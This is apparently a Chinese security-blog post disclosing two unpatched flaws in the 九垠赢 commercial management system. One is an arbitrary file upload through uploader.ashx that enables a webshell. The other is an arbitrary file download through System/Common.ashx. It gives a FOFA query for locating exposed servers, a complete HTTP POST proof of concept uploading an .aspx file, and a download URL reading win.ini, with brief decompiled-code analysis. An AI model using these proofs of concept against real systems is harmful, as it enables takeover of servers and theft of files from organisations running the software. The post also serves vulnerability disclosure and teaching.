文章总结： 本文分析九垠赢商业管理系统两处高危漏洞：uploader.ashx接口无后缀校验导致任意文件上传，可获取WebShell；System/Common.ashx接口在type=download时未过滤路径，导致任意文件下载。建议用户尽快修复或限制相关接口访问以防止服务器被控。 综合评分： 82 文章分类： 代码审计,漏洞分析,漏洞POC

[跟着静师傅学代码审计]九垠赢商业管理系统0day-文件上传和任意文件下载

原创

静师傅

安静安全

2026年1月14日 16:14 广东

点击上方「蓝字」，关注我们

审计过程

FOFA:

app=”九垠软件-九垠赢”

文件上传POC:

POST /uploader.ashx HTTP/1.1Host: IP:PORTUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gWContent-Length: 725
------WebKitFormBoundary7MA4YWxkTrZu0gWContent-Disposition: form-data; name="fileList"; filename="test.aspx"Content-Type: text/plain
test------WebKitFormBoundary7MA4YWxkTrZu0gW--

uploader.ashx对应DLL为WRM.Web.User.dll

分析uploader可以看到HTTP请求中获取名为”fileList”的文件，然后将其保存到服务器的”Upload”目录下，没有任何后缀限制。通过Write写入文件并返回上传文件的完整路径。

任意文件下载POC:

http://IP:PORT/System/Common.ashx?type=download&file=file:///C:/windows/win.ini

Common.ashx对应DLL为WRM.Web.Development.dll

位于WRM.Web.Development下的_Common进行分析

ProcessRequest方法下有多个case选择，参数为type

当type为download时，跟进函数DownloadFile

1.方法从HttpContext中获取名为”file”的参数。

2.将参数按’/’分割，取最后一部分作为文件名。

3.使用WebClient下载该参数指定的文件（服务器本地路径）。

4.将下载的文件以附件形式返回给客户端。

往期文章推荐

[零日全网首发!]腾达路由器命令注入

[代码审计]蓝凌EIS存在多个后台文件上传0day

[安全研究篇]利用.search-ms泄露NTLM哈希

交流群：安静安全

点个「在看」，你最好看

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：安静安全 静师傅《[跟着静师傅学代码审计]九垠赢商业管理系统0day-文件上传和任意文件下载》